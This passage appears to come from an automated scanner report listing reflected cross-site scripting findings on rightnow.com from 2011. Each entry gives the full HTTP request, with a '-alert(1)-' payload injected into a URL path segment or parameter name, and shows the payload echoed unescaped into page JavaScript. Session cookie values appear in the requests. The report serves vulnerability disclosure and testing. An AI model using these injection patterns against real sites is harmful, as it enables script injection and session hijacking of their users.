page_url: 'http://www.rightnow.com/javascriptc7146'-alert(1)-'b47c019bbba/floatbox/options.js',
isPremium: '0',
time: tsTimeStamp
});

}
if(includeOmniture != "no")
{
jQuery.ajaxSetup({async: false}
...[SNIP]...

4.248. http://www.rightnow.com/javascript/floatbox/options.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rightnow.com
Path:	/javascript/floatbox/options.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f14c3'-alert(1)-'4fea86764d0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /javascript/floatboxf14c3'-alert(1)-'4fea86764d0/options.js HTTP/1.1
Host: www.rightnow.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.rightnow.com/javascript/s_code.js25e2d%27-alert(1)-%27cd0cf84d869?_=1314814583383
Cookie: s_vi=[CS]v1|272F47EA8501068E-6000010AE03739B6[CE]; PHPSESSID=5acd71n9cl008n5ut73i1l9fs0; s_sess=%20s_cc%3Dtrue%3B%20p17%3Dhttp%253A%252F%252Fwww.fakereferrerdominator.com%252FreferrerPathName%253FRefParName%253DRefValue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Date: Wed, 31 Aug 2011 19:49:43 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 38628

...

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><
...[SNIP]...
y.get('http://www.rightnow.com/includes/premium_integration.php',
{
c_id: existingRightNowContactID,
page_url: 'http://www.rightnow.com/javascript/floatboxf14c3'-alert(1)-'4fea86764d0/options.js',
isPremium: '0',
time: tsTimeStamp
});

}
if(includeOmniture != "no")
{
jQuery.ajaxSetup({async: false});

...[SNIP]...

4.249. http://www.rightnow.com/javascript/floatbox/options.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rightnow.com
Path:	/javascript/floatbox/options.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5c7cf'-alert(1)-'91c57ac54d0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /javascript/floatbox/options.js5c7cf'-alert(1)-'91c57ac54d0 HTTP/1.1
Host: www.rightnow.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.rightnow.com/javascript/s_code.js25e2d%27-alert(1)-%27cd0cf84d869?_=1314814583383
Cookie: s_vi=[CS]v1|272F47EA8501068E-6000010AE03739B6[CE]; PHPSESSID=5acd71n9cl008n5ut73i1l9fs0; s_sess=%20s_cc%3Dtrue%3B%20p17%3Dhttp%253A%252F%252Fwww.fakereferrerdominator.com%252FreferrerPathName%253FRefParName%253DRefValue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Date: Wed, 31 Aug 2011 19:49:43 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 38628

...

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><
...[SNIP]...
://www.rightnow.com/includes/premium_integration.php',
{
c_id: existingRightNowContactID,
page_url: 'http://www.rightnow.com/javascript/floatbox/options.js5c7cf'-alert(1)-'91c57ac54d0',
isPremium: '0',
time: tsTimeStamp
});

}
if(includeOmniture != "no")
{
jQuery.ajaxSetup({async: false});
jQuery.ge
...[SNIP]...

4.250. http://www.rightnow.com/javascript/floatbox/options.js [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rightnow.com
Path:	/javascript/floatbox/options.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f994b'-alert(1)-'7f5fbe479da was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /javascript/floatbox/options.js?f994b'-alert(1)-'7f5fbe479da=1 HTTP/1.1
Host: www.rightnow.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.rightnow.com/javascript/s_code.js25e2d%27-alert(1)-%27cd0cf84d869?_=1314814583383
Cookie: s_vi=[CS]v1|272F47EA8501068E-6000010AE03739B6[CE]; PHPSESSID=5acd71n9cl008n5ut73i1l9fs0; s_sess=%20s_cc%3Dtrue%3B%20p17%3Dhttp%253A%252F%252Fwww.fakereferrerdominator.com%252FreferrerPathName%253FRefParName%253DRefValue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Date: Wed, 31 Aug 2011 19:49:43 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 38631

...

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><
...[SNIP]...
//www.rightnow.com/includes/premium_integration.php',
{
c_id: existingRightNowContactID,
page_url: 'http://www.rightnow.com/javascript/floatbox/options.js?f994b'-alert(1)-'7f5fbe479da=1',
isPremium: '0',
time: tsTimeStamp
});

}
if(includeOmniture != "no")
{
jQuery.ajaxSetup({async: false});
jQuery.
...[SNIP]...

4.251. http://www.rightnow.com/javascript/form.110610.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rightnow.com
Path:	/javascript/form.110610.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c525'-alert(1)-'f85878e1394 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /javascript8c525'-alert(1)-'f85878e1394/form.110610.js HTTP/1.1
Host: www.rightnow.com
Proxy-Connection: keep-alive
Referer: http://www.rightnow.com/search/?q=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=guhn714pb9618mpe96ualf8nm7; s_sess=%20s_cc%3Dtrue%3B%20p17%3Dhttp%253A%252F%252Fwww.rightnow.com%252Fcx.php%3B%20s_sq%3D%3B; s_vi=[CS]v1|272F3D2685158195-400001808002B910[CE]; COOKIE_TEST=RNT

Response

HTTP/1.1 404 Not Found
Date: Wed, 31 Aug 2011 18:16:03 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 38702

...

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><
...[SNIP]...
jQuery.get('http://www.rightnow.com/includes/premium_integration.php',
{
c_id: existingRightNowContactID,
page_url: 'http://www.rightnow.com/javascript8c525'-alert(1)-'f85878e1394/form.110610.js',
isPremium: '0',
time: tsTimeStamp
});

}
if(includeOmniture != "no")
{
jQuery.ajaxSetup({async: false});

...[SNIP]...

4.252. http://www.rightnow.com/javascript/form.110610.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rightnow.com
Path:	/javascript/form.110610.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bbab8'-alert(1)-'4bb75d35616 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /javascript/form.110610.jsbbab8'-alert(1)-'4bb75d35616 HTTP/1.1
Host: www.rightnow.com
Proxy-Connection: keep-alive
Referer: http://www.rightnow.com/search/?q=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=guhn714pb9618mpe96ualf8nm7; s_sess=%20s_cc%3Dtrue%3B%20p17%3Dhttp%253A%252F%252Fwww.rightnow.com%252Fcx.php%3B%20s_sq%3D%3B; s_vi=[CS]v1|272F3D2685158195-400001808002B910[CE]; COOKIE_TEST=RNT

Response

HTTP/1.1 404 Not Found
Date: Wed, 31 Aug 2011 18:16:03 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 38702

...

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><
...[SNIP]...
'http://www.rightnow.com/includes/premium_integration.php',
{
c_id: existingRightNowContactID,
page_url: 'http://www.rightnow.com/javascript/form.110610.jsbbab8'-alert(1)-'4bb75d35616',
isPremium: '0',
time: tsTimeStamp
});

}
if(includeOmniture != "no")
{
jQuery.ajaxSetup({async: false});
jQuery.ge
...[SNIP]...

4.253. http://www.rightnow.com/javascript/form.110610.js [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rightnow.com
Path:	/javascript/form.110610.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c707a'-alert(1)-'805892914ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /javascript/form.110610.js?c707a'-alert(1)-'805892914ed=1 HTTP/1.1
Host: www.rightnow.com
Proxy-Connection: keep-alive
Referer: http://www.rightnow.com/search/?q=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=guhn714pb9618mpe96ualf8nm7; s_sess=%20s_cc%3Dtrue%3B%20p17%3Dhttp%253A%252F%252Fwww.rightnow.com%252Fcx.php%3B%20s_sq%3D%3B; s_vi=[CS]v1|272F3D2685158195-400001808002B910[CE]; COOKIE_TEST=RNT

Response

HTTP/1.1 404 Not Found
Date: Wed, 31 Aug 2011 18:16:03 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 38705

...

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><
...[SNIP]...
http://www.rightnow.com/includes/premium_integration.php',
{
c_id: existingRightNowContactID,
page_url: 'http://www.rightnow.com/javascript/form.110610.js?c707a'-alert(1)-'805892914ed=1',
isPremium: '0',
time: tsTimeStamp
});

}
if(includeOmniture != "no")
{
jQuery.ajaxSetup({async: false});
jQuery.
...[SNIP]...

4.254. http://www.rightnow.com/javascript/omniture_variable_setup.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rightnow.com
Path:	/javascript/omniture_variable_setup.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3f0a9'-alert(1)-'5e2ee8acf95 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /javascript3f0a9'-alert(1)-'5e2ee8acf95/omniture_variable_setup.js?_=1314814580371 HTTP/1.1
Host: www.rightnow.com
Proxy-Connection: keep-alive
Referer: http://www.rightnow.com/company-contact.php
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=guhn714pb9618mpe96ualf8nm7

Response

HTTP/1.1 404 Not Found
Date: Wed, 31 Aug 2011 18:15:55 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 38730

...

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><
...[SNIP]...
jQuery.get('http://www.rightnow.com/includes/premium_integration.php',
{
c_id: existingRightNowContactID,
page_url: 'http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/omniture_variable_setup.js?_=1314814580371',
isPremium: '0',
time: tsTimeStamp
});

}
if(includeOmniture != "no")
{
jQuery.a
...[SNIP]...

4.255. http://www.rightnow.com/javascript/omniture_variable_setup.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rightnow.com
Path:	/javascript/omniture_variable_setup.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9497f'-alert(1)-'cbe91a86368 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /javascript/omniture_variable_setup.js9497f'-alert(1)-'cbe91a86368?_=1314814580371 HTTP/1.1
Host: www.rightnow.com
Proxy-Connection: keep-alive
Referer: http://www.rightnow.com/company-contact.php
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=guhn714pb9618mpe96ualf8nm7

Response

HTTP/1.1 404 Not Found
Date: Wed, 31 Aug 2011 18:15:55 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 38730

...

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><
...[SNIP]...
rightnow.com/includes/premium_integration.php',
{
c_id: existingRightNowContactID,
page_url: 'http://www.rightnow.com/javascript/omniture_variable_setup.js9497f'-alert(1)-'cbe91a86368?_=1314814580371',
isPremium: '0',
time: tsTimeStamp
});

}
if(includeOmniture != "no")
{
jQuery.ajaxSetup({async: false});

...[SNIP]...

4.256. http://www.rightnow.com/javascript/omniture_variable_setup_part2.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rightnow.com
Path:	/javascript/omniture_variable_setup_part2.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d8a75'-alert(1)-'87f281d61ff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /javascriptd8a75'-alert(1)-'87f281d61ff/omniture_variable_setup_part2.js?_=1314814584816 HTTP/1.1
Host: www.rightnow.com
Proxy-Connection: keep-alive
Referer: http://www.rightnow.com/company-contact.php
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=guhn714pb9618mpe96ualf8nm7

Response

HTTP/1.1 404 Not Found
Date: Wed, 31 Aug 2011 18:15:58 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 38736

...

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><
...[SNIP]...
jQuery.get('http://www.rightnow.com/includes/premium_integration.php',
{
c_id: existingRightNowContactID,
page_url: 'http://www.rightnow.com/javascriptd8a75'-alert(1)-'87f281d61ff/omniture_variable_setup_part2.js?_=1314814584816',
isPremium: '0',
time: tsTimeStamp
});

}
if(includeOmniture != "no")
{
jQ
...[SNIP]...

4.257. http://www.rightnow.com/javascript/omniture_variable_setup_part2.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rightnow.com
Path:	/javascript/omniture_variable_setup_part2.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42cc8'-alert(1)-'b4ca22a382e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /javascript/omniture_variable_setup_part2.js42cc8'-alert(1)-'b4ca22a382e?_=1314814584816 HTTP/1.1
Host: www.rightnow.com
Proxy-Connection: keep-alive
Referer: http://www.rightnow.com/company-contact.php
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=guhn714pb9618mpe96ualf8nm7

Response

HTTP/1.1 404 Not Found
Date: Wed, 31 Aug 2011 18:16:01 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 38736

...

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><
...[SNIP]...
ow.com/includes/premium_integration.php',
{
c_id: existingRightNowContactID,
page_url: 'http://www.rightnow.com/javascript/omniture_variable_setup_part2.js42cc8'-alert(1)-'b4ca22a382e?_=1314814584816',
isPremium: '0',
time: tsTimeStamp
});

}
if(includeOmniture != "no")
{
jQuery.ajaxSetup({async: false});

...[SNIP]...

4.258. http://www.rightnow.com/javascript/ooyalabacklotapi.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rightnow.com
Path:	/javascript/ooyalabacklotapi.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 994ac'-alert(1)-'85e529bbe1a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /javascript994ac'-alert(1)-'85e529bbe1a/ooyalabacklotapi.php?type=thumbnails&embedCode=xyaDhvMjqll5PTwsgsV6wwY9QorX6DyL&range=0-0&resolution=308x188 HTTP/1.1
Host: www.rightnow.com
Proxy-Connection: keep-alive
Referer: http://www.rightnow.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: application/xml, text/xml, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=guhn714pb9618mpe96ualf8nm7; s_vi=[CS]v1|272F3D2685158195-400001808002B910[CE]; COOKIE_TEST=RNT; noChat=RNTLIVE; s_sess=%20p17%3Dhttp%253A%252F%252Fburp%252Fshow%252F46%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Date: Wed, 31 Aug 2011 18:21:50 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 38796

...

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><
...[SNIP]...
jQuery.get('http://www.rightnow.com/includes/premium_integration.php',
{
c_id: existingRightNowContactID,
page_url: 'http://www.rightnow.com/javascript994ac'-alert(1)-'85e529bbe1a/ooyalabacklotapi.php?type=thumbnails&embedCode=xyaDhvMjqll5PTwsgsV6wwY9QorX6DyL&range=0-0&resolution=308x188',
isPremium: '0',
time: tsTimeStamp
});

...[SNIP]...

4.259. http://www.rightnow.com/javascript/ooyalabacklotapi.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rightnow.com
Path:	/javascript/ooyalabacklotapi.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bf90d'-alert(1)-'9266a2a23e1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /javascript/ooyalabacklotapi.phpbf90d'-alert(1)-'9266a2a23e1?type=thumbnails&embedCode=xyaDhvMjqll5PTwsgsV6wwY9QorX6DyL&range=0-0&resolution=308x188 HTTP/1.1
Host: www.rightnow.com
Proxy-Connection: keep-alive
Referer: http://www.rightnow.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: application/xml, text/xml, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=guhn714pb9618mpe96ualf8nm7; s_vi=[CS]v1|272F3D2685158195-400001808002B910[CE]; COOKIE_TEST=RNT; noChat=RNTLIVE; s_sess=%20p17%3Dhttp%253A%252F%252Fburp%252Fshow%252F46%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Date: Wed, 31 Aug 2011 18:21:50 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 38796

...

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><
...[SNIP]...
//www.rightnow.com/includes/premium_integration.php',
{
c_id: existingRightNowContactID,
page_url: 'http://www.rightnow.com/javascript/ooyalabacklotapi.phpbf90d'-alert(1)-'9266a2a23e1?type=thumbnails&embedCode=xyaDhvMjqll5PTwsgsV6wwY9QorX6DyL&range=0-0&resolution=308x188',
isPremium: '0',
time: tsTimeStamp
});

}
if(includ
...[SNIP]...

4.260. http://www.rightnow.com/javascript/rightnow.tv.player.swf [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rightnow.com
Path:	/javascript/rightnow.tv.player.swf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 562ae'-alert(1)-'040b828313e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /javascript562ae'-alert(1)-'040b828313e/rightnow.tv.player.swf HTTP/1.1
Host: www.rightnow.com
Proxy-Connection: keep-alive
Referer: http://www.rightnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=guhn714pb9618mpe96ualf8nm7; s_vi=[CS]v1|272F3D2685158195-400001808002B910[CE]; COOKIE_TEST=RNT; noChat=RNTLIVE; s_sess=%20p17%3Dhttp%253A%252F%252Fburp%252Fshow%252F46%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Date: Wed, 31 Aug 2011 18:21:15 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 38710

...

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><
...[SNIP]...
jQuery.get('http://www.rightnow.com/includes/premium_integration.php',
{
c_id: existingRightNowContactID,
page_url: 'http://www.rightnow.com/javascript562ae'-alert(1)-'040b828313e/rightnow.tv.player.swf',
isPremium: '0',
time: tsTimeStamp
});

}
if(includeOmniture != "no")
{
jQuery.ajaxSetup({async: fal
...[SNIP]...

4.261. http://www.rightnow.com/javascript/rightnow.tv.player.swf [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rightnow.com
Path:	/javascript/rightnow.tv.player.swf

Issue detail

